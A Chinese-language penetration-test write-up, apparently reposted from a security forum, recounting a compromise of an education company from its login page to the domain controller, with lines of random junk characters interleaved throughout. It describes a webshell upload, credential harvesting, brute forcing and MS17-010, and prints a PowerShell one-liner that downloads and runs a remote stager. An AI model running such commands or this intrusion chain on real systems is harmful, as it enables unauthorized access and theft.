3 b( H% z& W; ^
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路7 n1 C' |$ W5 H. ]
: B! z- G- u* F5 V4 y& m& [2 ~# k6 B7 j
" \! f. a( z3 W# f3 U& j7 x7 _
( n% G/ E0 i+ \; u. M3 n I: S
- B2 a+ x+ [+ n' i 正文
' p C+ _. W% w, }: U. V- K * r) W. [$ {+ m2 G4 B- v. Q
8 S- w* U' I- A/ G+ G
& ^, W# E% F* ~6 I * f# z/ W3 k4 I9 I1 E
% d2 [& F, z+ b+ y1 u; T( a9 v 目标:www.xxxx.com(一家教育机构) & B# r( u+ g5 l* A5 `
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
G4 Y. I* H, S3 o# u
, S0 H- m) i1 N6 {9 ^" V7 h' B. e- e3 c4 s7 @! h+ A
1 x. a& g- H, e' W! ]
. B- D) ?) {# |6 Q' d1 Q. E/ @8 D/ n$ e z
进行了简单的信息搜集
& L" ]# j9 `& ~ o9 ^5 W/ o * x6 [) A0 s# I+ }$ ]% w* m$ u* C4 o
% F. K1 {: q* Q% X/ l9 W, a
$ q& M4 M$ g: G: c) ^, l D0 m a6 U
7 p: S& y- |. G* l# |/ | 子域名搜集
5 W, w: Y$ q; [6 W
?8 H2 [. ~+ [: r F5 M* f+ G+ H2 g8 h8 H+ U( e3 _7 x% n- n" A
\/ G, {+ A; a: T; D2 W# x/ N e
( u, _4 q' U" T+ S/ Z6 ?: m
. u$ ]' v' B: C* J7 q. ? fofa找资产
: Q5 R5 R" ?, G
+ W; q7 ?( h& J" W0 b2 I
" S0 c& O/ f% l! M , W, s5 t, k/ n, f( s/ R
' r3 ^% |( V7 O& @2 M( w . u8 p# r% R h. Q) t! ^! y
/ T! \; w! n3 T! ^3 j" s# e
7 ?! q/ M* q- V$ W, n
一共七个资产。去重之后只有两个。 6 A1 o% t' K$ r# G
& z7 A l% U d8 Z/ [+ h% ^& H/ }4 k# y5 b% y7 J+ J
9 ]' n' p1 @+ E+ |6 l5 c/ k" S# {, i) |! r" i1 o! M
目录探测
" B6 B$ R/ n- A2 c: M6 w* U
6 z. p$ S( s1 s' e0 M) c* C8 k
3 n: p! I: b2 n3 M L' _5 f6 W9 C 0 h- D g* c" x% j8 J+ j
) z$ u1 J2 z9 t# l! a% ]9 ^/ c! p: X- ?0 z
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
" Z# V6 L6 k: X+ l0 Z# y5 Z/ o ; G4 |$ I; k7 p
2 u* @+ u4 W4 f
1 O, ?8 y0 `( t, B1 d" o; y. H2 K9 w
: t0 L5 v( G" U( p. V$ M- \ 我又尝试了通过修改返回包来绕过登录界面& G8 h0 o3 A! g$ M) i5 o2 @7 r
x: Z3 ~" u' s3 m/ M' h; R( \
: l7 D: N' z! \( W
P( J% p# F) Y% D
) k4 w L, d" B$ D
- o) U, L1 T) A9 g3 ~# Y9 W3 y5 }
还是不行,尝试注入无果
. Z5 e$ h. Z/ r7 s% H ' l4 T; q( l5 H/ X C* O
% L( e. B3 H4 h' g& A8 T* d+ P) }
: J$ D" Y8 M, N( G( @4 | 5 _2 m. `0 q3 z8 ^2 h
: A7 V6 l( t- \) d( W
不过我目录探测出了一处Spring信息泄露
$ P4 M' ^" s( s% p 2 e% c2 a# R8 W# C
; r H$ _' q, v; A- l2 R7 [
# D* n! s" I. i
3 f, v5 |$ j3 \
+ T, T3 e* S7 h) e! o% {0 f . P+ C6 J6 ~, b& _: H# S
7 X- H* {7 A- r8 n h4 Q5 b
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
; z: y. I: T% _) z# |, A s7 y J7 r9 ]; R, A9 @0 h
) N# j$ v) L% |+ G. X' E$ _+ ]
, @" C' v2 H0 T8 y* ` ! d* Z7 U! e( j9 y6 K) z! K
' \* @1 Y* G1 G' t- h _( {! I
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
3 ]: n3 w7 b) @! {- w
: d" t: K8 `4 }' U9 o4 S
7 |8 k7 ?4 m! Q# [4 c, Q8 i/ a
k E2 b5 @2 B6 w- D0 z! n) Q6 X ( P$ I% \# T: f0 B1 n, H' c
1 ^! h* i' M S6 y0 u. W9 f
获取有些师傅到这一步就手机抓包电脑测了。
5 T; E. C1 b* i( g! P $ @. B( N5 k4 b: s
( Q4 k& d3 t2 u, e
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。6 V' T4 {8 ~) c" f, D
) y! I7 @2 {3 Y9 v' T
% C' L7 H! j5 D# } 其中在一个公众号发现了小程序,可以进行注册。# v6 Q2 x; h) b& k5 D( |
7 W2 |: {3 y- d& t! d3 Y7 t
& ?& f) |: U+ e* f" h7 ?% Z 看到了头像上传,尝试上传获取WebShell
$ `, c& J {. A# o. m
1 E& L, |+ E* z3 J* p6 d! O) H4 S- J' ?1 T W8 Y U3 a- C8 }) a
0 S+ e( l) ?% M' ~: p% p7 s
/ k% T! P/ W/ U9 l" Z8 A
g" X4 e) i+ u1 x- `- C: } 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
; T: L0 ^' Z7 ` 2 H/ t' S' k9 A ~
* P* [( B6 @- v
! ~- G ]# ~8 T ! H5 A! k7 v# K; [3 h
- {3 h$ P/ V& h6 y 然后上了大马
0 ~3 j3 V6 @' \- @
! q% _% }1 p, u$ T$ N
% l: X* N) q) k) f9 K. m . S" ^$ R% i P; `! Q
5 A" U( J, i5 n0 b
) ]* B) n' u- d0 V) e
' }9 D# q/ w: U 0 b4 B- @( l; h3 A; y9 D
6 ?, g7 N3 m2 j7 R$ V1 j G. Q% f 通过翻找文件发现数据库账号密码
1 r) O8 P( _6 k
- H2 I; K- Y. e4 ]! C h& {, w% F( M6 G$ m- P
6 H, K9 {0 y( x/ \" ]1 w) c: J9 g
' u4 ?+ W' K ~ k6 T
) R. d( K. O; [: X( \9 Q
--内网渗透9 r' r: X3 w" P, P" ^& j% K
9 K3 U4 r% B$ G6 o' r: G" y o! w6 Q( ` W3 H% `
直接通过powershell执行 cs上线
2 W" Q u e8 n$ r2 d " d/ O; X( B$ h/ y L, i
- h% ?1 b [# K3 ~3 y; G6 J2 U
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
* s1 z2 U* l0 [ q, W
' y3 v* {/ F& W r, o; v% M, `9 l1 l* @# j% ?
* N! ?2 x: ]4 @9 C: F9 O- @1 u
' c5 u9 Q% j9 }
$ w$ o& q7 L' Z5 X# O 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
1 c; x# G) g, o3 e' T2 x
* k. a% h) H. d5 y/ T
/ X. L( Z# k F' j1 O 1 q c" H- d& p9 l; _
' A7 ~3 i% S, Z( w2 S# [
8 J' `9 k- Y) N$ S& \. T
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 8 U I5 z! ^# g* [) c; A! @
) d* d$ e3 s& D. J7 M9 D
4 w2 b$ e ~6 {! I* k2 r0 v# @& i# h1 G
7 q7 \3 G1 V1 [8 t! C
8 O/ o: l5 v0 a& `5 z
& L& S6 r; N- s+ c: k( |9 ^ & E2 w5 V' K& H- t" v( U" q! H
3 l- X4 m8 f. ~ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
0 [$ D9 z! L: l7 E. V $ n) z# k- v. [/ [$ Q( A& A% W
1 _3 w/ Y1 p' w) c' s! M' L
y# V# t% k0 J1 e8 ~8 [
( C* v$ C; l* r9 I; r# F6 }
; ~0 D2 }* z1 j9 ~
/ l6 Y, B* @( q. `5 U+ P
( H [" y& P/ F& a; U5 T' T # L' n4 }5 S" e. o! R5 A0 E
" ^" l6 V$ p; Q, _, m% L$ y& Z1 g. \5 N" f/ G
# n5 ~& r8 h Q( P0 Y
( I. K- k/ n7 g: k, f+ x e$ w4 l
4 [) `. l1 ~1 s" ?+ ?
2 _3 f, U1 J* ^' q I7 g; Z) ?
6 x% c0 V1 q: N9 Z0 W& C
小结% Z$ e( M* g6 H8 H8 R
. ^" t3 x7 P- e$ {* T# X) E. z4 D3 B" K. ~- i
; c; D0 t& V) p2 i# J1 W: ?* T# H5 G1 b
; {! w3 G5 x8 g4 R. j+ r* E" ]& V& U6 S0 {- `
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
+ C/ z' Z+ L9 j* i 9 I. B& Z1 @. [) U" x
/ H% F' J! u/ i6 r5 x* ~$ m
) M) i3 T8 O, B, L4 Y/ m( @' G 5 a% `8 B) ]* y; v
8 |# h- E, ]% O% t7 ?* z
- 9 U$ E% g* |: V: O' W* h" ~: Q
2 F; w; b3 V5 } ~/ v* ~8 a) l
. z+ F5 e. M# T
- ( D% Z. b4 u9 M* T5 l( ]8 N
5 X" b' q2 d: m0 b. Y8 e2 t
_ j5 F: Y. }' H' Z( V' ]
1 x5 I9 C4 w4 W* d9 y1 E6 k
+ W) G0 ^3 B% B* z6 n 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
6 ?. A9 w5 B$ p: J5 i 1 P! {6 N) Z" w3 r3 F4 K- p
! Z- d5 D) |. n5 h3 C8 z
0 g6 d" P; L5 C; x% V9 w4 Z
|